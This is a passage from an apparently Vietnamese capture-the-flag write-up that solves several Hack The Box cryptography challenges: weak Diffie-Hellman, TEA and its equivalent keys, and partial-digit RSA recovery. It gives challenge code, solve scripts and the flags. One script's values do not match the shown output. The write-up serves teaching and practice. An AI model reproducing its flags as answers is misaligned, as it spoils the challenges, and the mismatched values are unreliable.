print(f'g = 0x{g:x}')

a = random.randint(1, p-1)
b = random.randint(1, p-1)

A, B = pow(g, a, p), pow(g, b, p)

print(f'A = 0x{A:x}')
print(f'B = 0x{B:x}')

C = pow(A, b, p)
assert C == pow(B, a, p)

# now use it as shared secret
hash = sha256()
hash.update(long_to_bytes(C))

key = hash.digest()[:16]
iv = b'\xc1V2\xe7\xed\xc7@8\xf9\\\xef\x80\xd7\x80L*'
cipher = AES.new(key, AES.MODE_CBC, iv)

encrypted = cipher.encrypt(pad(FLAG, 16))
print(f'ciphertext = {encrypted}')


Output:

p = 0xdd6cc28d
g = 0x83e21c05
A = 0xcfabb6dd
B = 0xc4a21ba9
ciphertext = b'\x94\x99\x01\xd1\xad\x95\xe0\x13\xb3\xacZj{\x97|z\x1a(&\xe8\x01\xe4Y\x08\xc4\xbeN\xcd\xb2*\xe6{'

Solution
Tới bài này thì mức độ đã được nâng lên một chút (từ very easy thành easy 🐧), về cơ bản đây là một giao thức mà ai học Crypto cũng biết: DH. Bài này mình thấy p khá bé và còn là Smooth Number nên tìm a bằng logarit là khả thi.
from sympy import discrete_log
from hashlib import sha256
from Crypto.Util.number import long_to_bytes
from Crypto.Util.Padding import unpad
from Crypto.Cipher import AES

'''
A = g^a (mod p)
B = g^b (mod p)
C = g^a^b (mod p) = A^b (mod p)
'''

p = 0xdd6cc28d
g = 0x83e21c05
A = 0xcfabb6dd
B = 0xc4a21ba9

ciphertext = b'\x94\x99\x01\xd1\xad\x95\xe0\x13\xb3\xacZj{\x97|z\x1a(&\xe8\x01\xe4Y\x08\xc4\xbeN\xcd\xb2*\xe6{'
iv = b'\xc1V2\xe7\xed\xc7@8\xf9\\\xef\x80\xd7\x80L*'

a = discrete_log(p, A, g)
b = discrete_log(p, B, g)
assert pow(A, b, p) == pow(B, a, p)
C = pow(A, b, p)
hash = sha256()
hash.update(long_to_bytes(C))
key = hash.digest()[:16]

cipher = AES.new(key, AES.MODE_CBC, iv)
flag = unpad(cipher.decrypt(ciphertext), 16)

print(flag.decode())

Flag
HTB{y0u_n3ed_a_b1gGeR_w3ap0n!!}
Iced TEA
credit: Zupp
Description

Source:

import os
from secret import FLAG
from Crypto.Util.Padding import pad
from Crypto.Util.number import bytes_to_long as b2l, long_to_bytes as l2b
from enum import Enum

class Mode(Enum):
    ECB = 0x01
    CBC = 0x02

class Cipher:
    def __init__(self, key, iv=None):
        self.BLOCK_SIZE = 64
        self.KEY = [b2l(key[i:i+self.BLOCK_SIZE//16]) for i in range(0, len(key), self.BLOCK_SIZE//16)]
        self.DELTA = 0x9e3779b9
        self.IV = iv
        if self.IV:
            self.mode = Mode.CBC
        else:
            self.mode = Mode.ECB

    def _xor(self, a, b):
        return b''.join(bytes([_a ^ _b]) for _a, _b in zip(a, b))

    def encrypt(self, msg):
        msg = pad(msg, self.BLOCK_SIZE//8)
        blocks = [msg[i:i+self.BLOCK_SIZE//8] for i in range(0, len(msg), self.BLOCK_SIZE//8)]

        ct = b''
        if self.mode == Mode.ECB:
            for pt in blocks:
                ct += self.encrypt_block(pt)
        elif self.mode == Mode.CBC:
            X = self.IV
            for pt in blocks:
                enc_block = self.encrypt_block(self._xor(X, pt))
                ct += enc_block
                X = enc_block
        return ct

    def encrypt_block(self, msg):
        m0 = b2l(msg[:4])
        m1 = b2l(msg[4:])
        K = self.KEY
        msk = (1 << (self.BLOCK_SIZE//2)) - 1

        s = 0
        for i in range(32):
            s += self.DELTA
            m0 += ((m1 << 4) + K[0]) ^ (m1 + s) ^ ((m1 >> 5) + K[1])
            m0 &= msk
            m1 += ((m0 << 4) + K[2]) ^ (m0 + s) ^ ((m0 >> 5) + K[3])
            m1 &= msk

        m = ((m0 << (self.BLOCK_SIZE//2)) + m1) & ((1 << self.BLOCK_SIZE) - 1) # m = m0 || m1

        return l2b(m)



if __name__ == '__main__':
    KEY = os.urandom(16)
    cipher = Cipher(KEY)
    ct = cipher.encrypt(FLAG)
    with open('output.txt', 'w') as f:
        f.write(f'Key : {KEY.hex()}\nCiphertext : {ct.hex()}')


Output:

Key : 850c1413787c389e0b34437a6828a1b2
Ciphertext : b36c62d96d9daaa90634242e1e6c76556d020de35f7a3b248ed71351cc3f3da97d4d8fd0ebc5c06a655eb57f2b250dcb2b39c8b2000297f635ce4a44110ec66596c50624d6ab582b2fd92228a21ad9eece4729e589aba644393f57736a0b870308ff00d778214f238056b8cf5721a843

Solution
Thật ra bài này chỉ cần làm ngược lại hàm encrypt để lấy hàm decrypt là xong chứ không cần phải làm gì nhiều
from Crypto.Util.number import long_to_bytes as l2b, bytes_to_long as b2l
from Crypto.Util.Padding import unpad
from enum import Enum

class Mode(Enum):
    ECB = 0x01
    CBC = 0x02

class Cipher:
    def __init__(self, key, iv=None):
        self.BLOCK_SIZE = 64
        self.KEY = [b2l(key[i:i+self.BLOCK_SIZE//16]) for i in range(0, len(key), self.BLOCK_SIZE//16)]
        self.DELTA = 0x9e3779b9
        self.IV = iv
        if self.IV:
            self.mode = Mode.CBC
        else:
            self.mode = Mode.ECB

    def _xor(self, a, b):
        return b''.join(bytes([_a ^ _b]) for _a, _b in zip(a, b))

    def decrypt(self, ciphertext):
        blocks = [ciphertext[i:i+self.BLOCK_SIZE//8] for i in range(0, len(ciphertext), self.BLOCK_SIZE//8)]

        pt = b''
        if self.mode == Mode.ECB:
            for ct_block in blocks:
                pt += self.decrypt_block(ct_block)
        elif self.mode == Mode.CBC:
            X = self.IV
            for ct_block in blocks:
                dec_block = self.decrypt_block(ct_block)
                pt += self._xor(X, dec_block)
                X = ct_block
        return pt

    def decrypt_block(self, ciphertext):
        c = b2l(ciphertext)
        K = self.KEY
        msk = (1 << (self.BLOCK_SIZE//2)) - 1

        m0 = c >> (self.BLOCK_SIZE//2)
        m1 = c & ((1 << (self.BLOCK_SIZE//2)) - 1)

        s = self.DELTA * 32
        for i in range(32):
            m1 -= ((m0 << 4) + K[2]) ^ (m0 + s) ^ ((m0 >> 5) + K[3])
            m1 &= msk
            m0 -= ((m1 << 4) + K[0]) ^ (m1 + s) ^ ((m1 >> 5) + K[1])
            m0 &= msk
            s -= self.DELTA

        m = (m0 << (self.BLOCK_SIZE//2)) | m1
        return l2b(m)


key = '850c1413787c389e0b34437a6828a1b2'
ct = 'b36c62d96d9daaa90634242e1e6c76556d020de35f7a3b248ed71351cc3f3da97d4d8fd0ebc5c06a655eb57f2b250dcb2b39c8b2000297f635ce4a44110ec66596c50624d6ab582b2fd92228a21ad9eece4729e589aba644393f57736a0b870308ff00d778214f238056b8cf5721a843'
key, ct = bytes.fromhex(key), bytes.fromhex(ct)

cipher = Cipher(key)
flag = unpad(cipher.decrypt(ct), 16).decode()
print(flag)

Flag
HTB{th1s_1s_th3_t1ny_3ncryp710n_4lg0r1thm_____y0u_m1ght_h4v3_4lr34dy_s7umbl3d_up0n_1t_1f_y0u_d0_r3v3rs1ng}
Arranged
credit: Zupp
Description

Source :

from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
from Crypto.Util.number import long_to_bytes
from hashlib import sha256

from secret import FLAG, p, b, priv_a, priv_b

F = GF(p)
E = EllipticCurve(F, [726, b])
G = E(926644437000604217447316655857202297402572559368538978912888106419470011487878351667380679323664062362524967242819810112524880301882054682462685841995367, 4856802955780604241403155772782614224057462426619061437325274365157616489963087648882578621484232159439344263863246191729458550632500259702851115715803253)

A = G * priv_a
B = G * priv_b

print(A)
print(B)

C = priv_a * B

assert C == priv_b * A

# now use it as shared secret
secret = C[0]

hash = sha256()
hash.update(long_to_bytes(secret))

key = hash.digest()[16:32]
iv = b'u\x8fo\x9aK\xc5\x17\xa7>[\x18\xa3\xc5\x11\x9en'
cipher = AES.new(key, AES.MODE_CBC, iv)

encrypted = cipher.encrypt(pad(FLAG, 16))
print(encrypted)


Output:

(6174416269259286934151093673164493189253884617479643341333149124572806980379124586263533252636111274525178176274923169261099721987218035121599399265706997 : 2456156841357590320251214761807569562271603953403894230401577941817844043774935363309919542532110972731996540328492565967313383895865130190496346350907696 : 1)
(4226762176873291628054959228555764767094892520498623417484902164747532571129516149589498324130156426781285021938363575037142149243496535991590582169062734 : 425803237362195796450773819823046131597391930883675502922975433050925120921590881749610863732987162129269250945941632435026800264517318677407220354869865 : 1)
b'V\x1b\xc6&\x04Z\xb0c\xec\x1a\tn\xd9\xa6(\xc1\xe1\xc5I\xf5\x1c\xd3\xa7\xdd\xa0\x84j\x9bob\x9d"\xd8\xf7\x98?^\x9dA{\xde\x08\x8f\x84i\xbf\x1f\xab'

Solution
Well đến đây thì chall đã sang một mức độ khác là medium (nhưng cũng không quá khó). Đọc source mình biết được bài sử dụng ECC và giao thức là DH-ECC. Đề đã cung cấp iv và enc, thứ mình cần tìm lại là key.
Ở đây, key cũng chính là shared_secret trong các dạng bài giao thức khóa DH quen thuộc, và vấn đề nằm ở hai khóa riêng priv_a và priv_b (chỉ cần tìm một trong hai là có thể giải được bài rồi). Tuy nhiên, bài không define cho ta một ellip cụ thể, rõ ràng mình cần tìm lại ellip này.
Ta biết được 3 điểm G, A và B đều thuộc ellip xét trong trường Fp, cụ thể tọa độ của 3 điểm này sẽ thỏa mãn phương trình của ellip, hay:
y_G ^ 2 = x_G ^ 3 + 726*x_G + b (mod p) (1)
y_A ^ 2 = x_A ^ 3 + 726*x_A + b (mod p) (2)
y_B ^ 2 = x_B ^ 3 + 726*x_B + b (mod p) (3)

Tại đây ta cần tìm lại hệ số b và trường của ellip. Trừ phương trình (1) cho (2) và (3) và chuyển vế, ta thu được 2 phương trình dạng left = 0 (mod p), lấy GCD của hai cái left này giúp mình tìm lại p, đồng thời giải luôn được b:
ef L(P):
    x, y = P[0], P[1]
    return y**2 - x**3 - 726*x

G = (926644437000604217447316655857202297402572559368538978912888106419470011487878351667380679323664062362524967242819810112524880301882054682462685841995367, 4856802955780604241403155772782614224057462426619061437325274365157616489963087648882578621484232159439344263863246191729458550632500259702851115715803253)
A = (6174416269259286934151093673164493189253884617479643341333149124572806980379124586263533252636111274525178176274923169261099721987218035121599399265706997, 2456156841357590320251214761807569562271603953403894230401577941817844043774935363309919542532110972731996540328492565967313383895865130190496346350907696)
B = (4226762176873291628054959228555764767094892520498623417484902164747532571129516149589498324130156426781285021938363575037142149243496535991590582169062734, 425803237362195796450773819823046131597391930883675502922975433050925120921590881749610863732987162129269250945941632435026800264517318677407220354869865)

p = GCD(L(G) - L(A), L(G) - L(B))
b = L(G) % p

assert (G[1]**2) % p == (G[0]**3 + 726*G[0] + b) % p
assert (A[1]**2) % p == (A[0]**3 + 726*A[0] + b) % p
assert (B[1]**2) % p == (B[0]**3 + 726*B[0] + b) % p

Ta đã recover lại được ellip, giờ cần tìm priv_a hoặc priv_b. Mình đã nghĩ tới ý tưởng áp dụng Smart's Attack nhưng khi check lại thì điều kiện E.order() == p bị sai. Đánh liều dlog ra thì lại làm được hoặc là mình cũng có thể dùng baby step giant step 🐧:
F = GF(p)
E = EllipticCurve(F, [726, b])

G, A, B = E(G), E(A), E(B)
priv_a = discrete_log(A, G, operation='+')

Chạy hơi lâu chút nhưng cuối cùng sẽ ra được priv_a = 4, đem đi giải key là xong (ai ngựa ngựa có thể tìm luôn priv_b rồi assert thử xem đúng hay sai).
Full code:
from Crypto.Util.number import *
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
from Crypto.Util.number import long_to_bytes
from hashlib import sha256

def L(P):
    x, y = P[0], P[1]
    return y**2 - x**3 - 726*x

G = (926644437000604217447316655857202297402572559368538978912888106419470011487878351667380679323664062362524967242819810112524880301882054682462685841995367, 4856802955780604241403155772782614224057462426619061437325274365157616489963087648882578621484232159439344263863246191729458550632500259702851115715803253)
A = (6174416269259286934151093673164493189253884617479643341333149124572806980379124586263533252636111274525178176274923169261099721987218035121599399265706997, 2456156841357590320251214761807569562271603953403894230401577941817844043774935363309919542532110972731996540328492565967313383895865130190496346350907696)
B = (4226762176873291628054959228555764767094892520498623417484902164747532571129516149589498324130156426781285021938363575037142149243496535991590582169062734, 425803237362195796450773819823046131597391930883675502922975433050925120921590881749610863732987162129269250945941632435026800264517318677407220354869865)

p = GCD(L(G) - L(A), L(A) - L(B))
b = L(G) % p

assert (G[1]**2) % p == (G[0]**3 + 726*G[0] + b) % p
assert (A[1]**2) % p == (A[0]**3 + 726*A[0] + b) % p
assert (B[1]**2) % p == (B[0]**3 + 726*B[0] + b) % p

F = GF(p)
E = EllipticCurve(F, [726, b])

G, A, B = E(G), E(A), E(B)
# priv_a = discrete_log(A, G, operation='+')
priv_a = 4
shared_secret = (B * priv_a).xy()[0]
hash = sha256()
hash.update(long_to_bytes(int(shared_secret)))

key = hash.digest()[16:32]
ciphertext = b'V\x1b\xc6&\x04Z\xb0c\xec\x1a\tn\xd9\xa6(\xc1\xe1\xc5I\xf5\x1c\xd3\xa7\xdd\xa0\x84j\x9bob\x9d"\xd8\xf7\x98?^\x9dA{\xde\x08\x8f\x84i\xbf\x1f\xab'
iv = b'u\x8fo\x9aK\xc5\x17\xa7>[\x18\xa3\xc5\x11\x9en'
cipher = AES.new(key, AES.MODE_CBC, iv)
flag = unpad(cipher.decrypt(ciphertext), 16)

print(flag.decode())

Flag
HTB{0rD3r_mUsT_b3_prEs3RveD_!!@!}
Partial Tenacity
credit: Zupp
Description

Source:

from secret import FLAG
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP

class RSACipher:
    def __init__(self, bits):
        self.key = RSA.generate(bits)
        self.cipher = PKCS1_OAEP.new(self.key)

    def encrypt(self, m):
        return self.cipher.encrypt(m)

    def decrypt(self, c):
        return self.cipher.decrypt(c)

cipher = RSACipher(1024)

enc_flag = cipher.encrypt(FLAG)

with open('output.txt', 'w') as f:
    f.write(f'n = {cipher.key.n}\n')
    f.write(f'ct = {enc_flag.hex()}\n')
    f.write(f'p = {str(cipher.key.p)[::2]}\n')
    f.write(f'q = {str(cipher.key.q)[1::2]}')


Output:

n = 124489602600121701274548809815923584607837171501534880261503180856938186391623267155644651085143459140143217303598468742852882882427469507691050712387595895502373303396701424516638188457555247307277206394398562666677288285701252034906810402407918122597636299856574712902166065585733567177021600418361645177173
ct = 1f287749a7dae2256bec91f58c614d57471ad05ccadc6f6923b46798571db3c623dd14157e8b909ed1fbba3af6e0dec562b120a64f261da0f591504b03c99054eed8b698725b6707c5250cce0308a289a83a8ff89790e845f6aab43a0e9419ba843cc729aeef3ad39ce23f17ad30c3a2e7743c5007d2f684019efbadf1592aad
p = 171539328165412321875748057028552243899150327277402310685789246185479388035679
q = 12370078203860528037238299503161295765194367399450231656330777573089075282486

Solution
Bài này làm mình khá nản lúc đầu nhưng may có anh Tuệ support nên đã làm được. Bài thuộc một dạng RSA với partial known bits (nói là bits thôi nhưng thực ra các số p và q đã bị khuyết mất các chữ số).
Mình đã biết được p và q kia chính là các số còn lại sau khi thay đổi p, q ban đầu. Cụ thể với p từ vị trí [0] đến cuối thì cách một chữ số lại xóa đi một lần, q thì xuất phát từ vị trí [1].
Để làm được bài này thì mình cần sử dụng một chút toán tiểu học và logic. Xét phép nhân p * q == n, theo như cách nhân từng học thì:
p[-1] * q[-1] == n[-1]
p[-2] * q[-2] == n[-2]
...


Nếu kết quả vượt quá 10 thì nhớ và lấy chữ số hàng đơn vị rồi cộng phần nhớ cho hàng tiếp theo, cụ thể như sau:

Giả sử có:
p[-1] = 3, p[-2] = 2
q[-1] = 5, q[-2] = 3
thì :
    n[-1] = 3 * 5 = 15, viết 5 nhớ 1
    n[-2] = 2 * 3 = 6, nhớ 1 là 7
nhận được n[-1] = 5 và n[-2] = 7


Bản chất chính là:

n[-1] = p[-1] * q[-1] (mod 10)
n[-2] = p[-1] * q[-1] + n[-1] // 10 (mod 10)
...

Vì vậy áp dụng logic trên, ta có thể recover lại toàn bộ số p và q, code hơi khó một chút nhưng khá hay. Idea ở đây là thử từng trường hợp vào chỗ khuyết rồi nhân lại xem thỏa mãn hay không.
Full code:
from Crypto.Util.number import *
from Crypto.Cipher import PKCS1_OAEP
from Crypto.PublicKey import RSA
from Crypto.PublicKey.RSA import RsaKey

class RSACipher:
    def __init__(self, bits):
        self.key = RsaKey(n=n, e=e, d=inverse(e, (p-1)*(q-1)), p=p, q=q, u=inverse(p, q))
        self.cipher = PKCS1_OAEP.new(self.key)

    def decrypt(self, c):
        return self.cipher.decrypt(c)

e = 65537
n = 118641897764566817417551054135914458085151243893181692085585606712347004549784923154978949512746946759125187896834583143236980760760749398862405478042140850200893707709475167551056980474794729592748211827841494511437980466936302569013868048998752111754493558258605042130232239629213049847684412075111663446003
ct = '7f33a035c6390508cee1d0277f4712bf01a01a46677233f16387fae072d07bdee4f535b0bd66efa4f2475dc8515696cbc4bc2280c20c93726212695d770b0a8295e2bacbd6b59487b329cc36a5516567b948fed368bf02c50a39e6549312dc6badfef84d4e30494e9ef0a47bd97305639c875b16306fcd91146d3d126c1ea476'
c = int(ct, 16)
leak_p = '1_5_1_4_4_1_4_7_3_3_5_7_1_3_6_1_5_2_9_8_5_2_1_6_9_8_0_3_9_7_5_2_5_5_9_1_3_0_5_8_7_5_0_9_4_2_8_8_7_3_8_8_2_0_6_9_9_0_6_9_2_7_1_6_7_4_0_2_2_1_6_7_9_0_2_6_4_3'
leak_q = '_1_5_6_2_4_3_4_2_0_0_5_7_7_4_1_6_6_5_2_5_0_2_4_6_0_8_0_6_7_4_2_6_5_5_7_0_9_3_5_6_7_3_9_2_6_5_2_7_2_3_1_7_5_3_0_1_6_1_5_4_2_2_3_8_4_5_0_8_2_7_4_2_6_9_3_0_5_'

leak_p = leak_p.replace('_', '0')
leak_q = leak_q.replace('_', '0')

pq = {(int(leak_p), int(leak_q))}
TH = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]

for i in range(155//2 + 1):
    trials = set()
    for p, q in pq:
        for _p in TH:
            temp_p = p + _p*pow(10, 2*i + 1)
            for _q in TH:
                temp_q = q + _q*pow(10, 2*i)
                mod = pow(10, 2*i + 2)
                if (temp_p * temp_q) % mod != n % mod:
                    continue
                trials.add((temp_p, temp_q))
    pq = trials
p = list(pq)[0][0]
q = list(pq)[0][1]
assert p*q == n

cipher = RSACipher(1024)
flag = cipher.decrypt(long_to_bytes(int(ct, 16))).decode()
print(flag)

Flag
HTB{v3r1fy1ng_pr1m3s_m0dul0_p0w3rs_0f_10!}
Permuted
credit: Zupp
Description

Source:

from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
from Crypto.Util.number import long_to_bytes

from hashlib import sha256
from random import shuffle

from secret import a, b, FLAG

class Permutation:
    def __init__(self, mapping):
        self.length = len(mapping)

        assert set(mapping) == set(range(self.length))     # ensure it contains all numbers from 0 to length-1, with no repetitions
        self.mapping = list(mapping)

    def __call__(self, *args, **kwargs):
        idx, *_ = args
        assert idx in range(self.length)
        return self.mapping[idx]

    def __mul__(self, other):
        ans = []

        for i in range(self.length):
            ans.append(self(other(i)))

        return Permutation(ans)

    def __pow__(self, power, modulo=None):
        ans = Permutation.identity(self.length)
        ctr = self

        while power > 0:
            if power % 2 == 1:
                ans *= ctr
            ctr *= ctr
            power //= 2

        return ans

    def __str__(self):
        return str(self.mapping)

    def identity(length):
        return Permutation(range(length))


x = list(range(50_000))
shuffle(x)

g = Permutation(x)
print('g =', g)

A = g**a
print('A =', A)
B = g**b
print('B =', B)

C = A**b
assert C.mapping == (B**a).mapping

sec = tuple(C.mapping)
sec = hash(sec)
sec = long_to_bytes(sec)

hash = sha256()
hash.update(sec)

key = hash.digest()[16:32]
iv = b"mg'g\xce\x08\xdbYN2\x89\xad\xedlY\xb9"

cipher = AES.new(key, AES.MODE_CBC, iv)

encrypted = cipher.encrypt(pad(FLAG, 16))
print('c =', encrypted)

Challenge output: output.txt
Solution
Với mình thì chall này khá lỏ, google đã có nhưng không thèm osint nên mất khá nhiều time để solve. Về cơ bản thì bài cũng sử dụng giao thức DH nhưng thay vì ECC hay dlog như hai chall trên thì là Permuted. Dạng này khá mới với mình nhưng được mọi người support nên cũng đấm được.
Như hai bài trên, ta vẫn cần tìm lại key, cụ thể là tìm priv_a hoặc priv_b. Đọc source thì biết được phép toán trang bị trong nhóm Permuted này, bên cạnh đó, qua việc test nhiều lần thì mình nhận ra các phần tử trong nhóm Permuted này đều có các vòng giao hoán của nó, tạm gọi là order.
order ở đây là số k nhỏ nhất sao cho g**k = g, cái này khá giống với order trong định nghĩa nhóm. Vậy tại sao mình lại phân tích yếu tố order này?
Dựa vào hai paper này và cả này nữa, mình khá chắc có thể thực hiện dlog để tìm lại key. Nhưng dlog ở đây chỉ có approach giống Pohlig-Hellman, không phải hoàn toàn giống. Mình sẽ vẫn tìm lại order rồi factor, giải các phương trình nhỏ rồi dùng CRT để output ra kết quả cuối cùng.
Để tìm a thỏa A = g**a, trước tiên mình sẽ thử tính g.order(). Hàm order() này có thể dùng trong sage hoặc tự viết cũng được, nhưng cuối cùng sẽ tìm được: g.order() = 3311019189498977856900
Khi factor g.order() mình nhận được ước số khá bé, rất dễ dàng cho thuật toán Pohlig-Hellman trong Sn (Symmetric Group). Cụ thể code để tìm lại dlog như sau:
from output import g, A, B
from sage.all import *

g = PermutationGroupElement(Permutation([i+1 for i in g]))
A = PermutationGroupElement(Permutation([i+1 for i in A]))
B = PermutationGroupElement(Permutation([i+1 for i in B]))

o = g.order()
a = []
b = []
for p,e in factor(o):
    tg = g^(ZZ(o/p^e))
    tA = A^(ZZ(o/p^e))
    tB = B^(ZZ(o/p^e))
    for i in range(p^e):
        if tg^i==tA:
            a.append([i,p^e])
    for i in range(p^e):
        if tg^i==tB:
            b.append([i,p^e])
print(a)
print(b)
a = crt([i[0] for i in a],[i[1] for i in a])
b = crt([i[0] for i in b],[i[1] for i in b])

(Nhớ dùng trong sage)
Khi tìm lại được cả a và b mình đã assert oke đồng nghĩa với approach mình đúng và có thể giải flag dễ dàng rồi.

Script:

from output import g, A, B
from hashlib import sha256
from Crypto.Util.number import *
from Crypto.Util.Padding import unpad
from Crypto.Cipher import AES

g = PermutationGroupElement(Permutation([i+1 for i in g]))
A = PermutationGroupElement(Permutation([i+1 for i in A]))
B = PermutationGroupElement(Permutation([i+1 for i in B]))

o = g.order()
a = []
b = []
for p,e in factor(o):
    tg = g^(ZZ(o/p^e))
    tA = A^(ZZ(o/p^e))
    tB = B^(ZZ(o/p^e))
    for i in range(p^e):
        if tg^i==tA:
            a.append([i,p^e])
    for i in range(p^e):
        if tg^i==tB:
            b.append([i,p^e])
a = crt([i[0] for i in a],[i[1] for i in a])
b = crt([i[0] for i in b],[i[1] for i in b])

assert g^a == A
assert g^b == B

class Permutationx:
    def __init__(self, mapping):
        self.length = len(mapping)

        assert set(mapping) == set(range(self.length))     # ensure it contains all numbers from 0 to length-1, with no repetitions
        self.mapping = list(mapping)

    def __call__(self, *args, **kwargs):
        idx, *_ = args
        assert idx in range(self.length)
        return self.mapping[idx]

    def __mul__(self, other):
        ans = []

        for i in range(self.length):
            ans.append(self(other(i)))

        return Permutationx(ans)

    def __pow__(self, power, modulo=None):
        ans = Permutationx.identity(self.length)
        ctr = self

        while power > 0:
            if power % 2 == 1:
                ans *= ctr
            ctr *= ctr
            power //= 2

        return ans

    def __str__(self):
        return str(self.mapping)

    def identity(length):
        return Permutationx(range(length))

from output import g, A, B
g = Permutationx(g)
assert str(g**a) == str(A) and str(g**b) == str(B)

A, B = Permutationx(A), Permutationx(B)
C = A**b
assert C.mapping == (B**a).mapping

sec = tuple(C.mapping)
sec = hash(sec)
sec = long_to_bytes(sec)

hash = sha256()
hash.update(sec)

key = hash.digest()[16:32]
enc = b'\x89\xba1J\x9c\xfd\xe8\xd0\xe5A*\xa0\rq?!wg\xb0\x85\xeb\xce\x9f\x06\xcbG\x84O\xed\xdb\xcd\xc2\x188\x0cT\xa0\xaaH\x0c\x9e9\xe7\x9d@R\x9b\xbd'
iv = b"mg'g\xce\x08\xdbYN2\x89\xad\xedlY\xb9"

cipher = AES.new(key, AES.MODE_CBC, iv)
flag = unpad(cipher.decrypt(enc), 16).decode()
print(flag)

Flag
HTB{w3lL_n0T_aLl_gRoUpS_aRe_eQUaL_!!}
Tsayaki
credit: Zupp
Description

Source:

from tea import Cipher as TEA
from secret import IV, FLAG
import os

ROUNDS = 10

def show_menu():
    print("""
============================================================================================
|| I made this decryption oracle in which I let users choose their own decryption keys.   ||
|| I think that it's secure as the tea cipher doesn't produce collisions (?) ... Right?   ||
|| If you manage to prove me wrong 10 times, you get a special gift.                      ||
============================================================================================
""")

def run():
    show_menu()

    server_message = os.urandom(20)
    print(f'Here is my special message: {server_message.hex()}')

    used_keys = []
    ciphertexts = []
    for i in range(ROUNDS):
        print(f'Round {i+1}/10')
        try:
            ct = bytes.fromhex(input('Enter your target ciphertext (in hex) : '))
            assert ct not in ciphertexts

            for j in range(4):
                key = bytes.fromhex(input(f'[{i+1}/{j+1}] Enter your encryption key (in hex) : '))
                assert len(key) == 16 and key not in used_keys
                used_keys.append(key)
                cipher = TEA(key, IV)
                enc = cipher.encrypt(server_message)
                if enc != ct:
                    print(f'Hmm ... close enough, but {enc.hex()} does not look like {ct.hex()} at all! Bye...')
                    exit()
        except:
            print('Nope.')
            exit()

        ciphertexts.append(ct)

    print(f'Wait, really? {FLAG}')


if __name__ == '__main__':
    run()

Challenge code: Tương tự bài Iced TEA
Solution
Trước hết, mình sẽ phân tích flow của server. Server đầu tiên sẽ cung cấp cho chúng ta một server_message (gọi tắt là sm). sm sẽ được mã hóa bằng thuật toán TEA-CBC với IV cố định (IV này lấy từ local), vậy còn key thì sao? Chúng ta sẽ chính là người cung cấp key cho bài. Thực chất server sẽ chạy 10 vòng, ở mỗi vòng sẽ lấy vào ct và 4 key của mình, nếu có thể tạo ra collision giữa ct và enc_sm thì được accept và chạy vào vòng kế tiếp. Tất nhiên sau khi sử dụng key nào thì key đó sẽ trở nên useless cho vòng key tiếp theo. ct cũng không được reused btw 😺:
Nếu bypass được tất cả 10 vòng này thì server sẽ nhả flag cho mình, nói là 10 vòng cho bé thôi chứ mỗi vòng chính lại cần tìm 4 key khác nhau, tổng cộng là mình cần có 10 cặp (4 keys, ct) để break bài này.
Trước hết IV là cố định và mode là CBC nên việc recover lại IV không quá khó, yêu cầu hiểu về các mode là có thể làm được rồi:

Như đã thấy, đề bài cung cấp cho chúng ta sm, bản mã của sm, key do chúng ta cung cấp, vậy thì bằng một thủ thuật đơn giản mình có thể tìm lại được IV:
CBC:
E(key, sm ^ IV) = enc_sm
D(key, enc_sm) = sm ^ IV

Tuy nhiên nếu để ý kĩ, ta sẽ thấy D(key, enc_sm) của CBC khá giống với ECB, vậy nên mình sẽ decrypt(enc_sm) bằng mode ECB và xor output với sm là recover xong IV:
from Crypto.Util.number import long_to_bytes as l2b, bytes_to_long as b2l
from Crypto.Util.Padding import unpad, pad
from enum import Enum

class Mode(Enum):
    ECB = 0x01
    CBC = 0x02

class Cipher:
    def __init__(self, key, iv=None):
        self.BLOCK_SIZE = 64
        self.KEY = [b2l(key[i:i+self.BLOCK_SIZE//16]) for i in range(0, len(key), self.BLOCK_SIZE//16)]
        self.DELTA = 0x9e3779b9
        self.IV = iv
        if self.IV:
            self.mode = Mode.CBC
        else:
            self.mode = Mode.ECB

    def _xor(self, a, b):
        return b''.join(bytes([_a ^ _b]) for _a, _b in zip(a, b))

    def decrypt(self, ciphertext):
        blocks = [ciphertext[i:i+self.BLOCK_SIZE//8] for i in range(0, len(ciphertext), self.BLOCK_SIZE//8)]

        pt = b''
        if self.mode == Mode.ECB:
            for ct_block in blocks:
                pt += self.decrypt_block(ct_block)
        elif self.mode == Mode.CBC:
            X = self.IV
            for ct_block in blocks:
                dec_block = self.decrypt_block(ct_block)
                pt += self._xor(X, dec_block)
                X = ct_block
        return pt

    def decrypt_block(self, ciphertext):
        c = b2l(ciphertext)
        K = self.KEY
        msk = (1 << (self.BLOCK_SIZE//2)) - 1

        m0 = c >> (self.BLOCK_SIZE//2)
        m1 = c & ((1 << (self.BLOCK_SIZE//2)) - 1)

        s = self.DELTA * 32
        for i in range(32):
            m1 -= ((m0 << 4) + K[2]) ^ (m0 + s) ^ ((m0 >> 5) + K[3])
            m1 &= msk
            m0 -= ((m1 << 4) + K[0]) ^ (m1 + s) ^ ((m1 >> 5) + K[1])
            m0 &= msk
            s -= self.DELTA

        m = (m0 << (self.BLOCK_SIZE//2)) | m1
        return l2b(m)

pt = '712ebc63b7ee138ddf8e2405309c38448b310e6d'
key = b'1' * 16
ct = 'ac442644f6e843e4382da8864248e85751ef723cc9a14d34'

pt, ct = bytes.fromhex(pt), bytes.fromhex(ct)
cipher = Cipher(key)
temp = cipher.decrypt(ct)
IV = cipher._xor(temp, pt)[:8]
print(IV)

(Nhớ dùng lại file như bài Iced TEA. pt và ct ở trên là mình lấy từ server, còn key là của mình gửi lên)
Tìm được IV = b'\r\xdd\xd2w<\xf4\xb9\x08' (chỉ 8 bytes thôi nên đừng confuse 🐒, just chill). Việc tìm lại IV rất có ý nghĩa cho attack của mình vì mình phải gửi lên ct đã encrypt bằng key và IV.
Công việc tiếp theo yêu cầu chúng ta kiến thức về Equivalent keys. Tài liệu tham khảo về Equivalent keys có thể xem ở mục 3.5 trong đây (shout-out anh Thangcoithongminh 🔥). Vì paper đã viết khá rõ rồi nên mình sẽ chỉ giải thích vulnerability thôi. Nếu nhìn vào hàm encrypt_block trong class Cipher:

Thì ai cũng sẽ nhận ra vấn đề các key khác nhau có thể mã hóa giống nhau cho một bản rõ, ở đây maximum chỉ tìm được 3 key khác nên số vòng test key là 4 :monkey:
Dài dòng như trên nhưng cuối cùng kiểu gì cũng sẽ tìm được 4 keys lần lượt là:
h = 0x80000000

K0 = k0 + k1 + k2 + k3
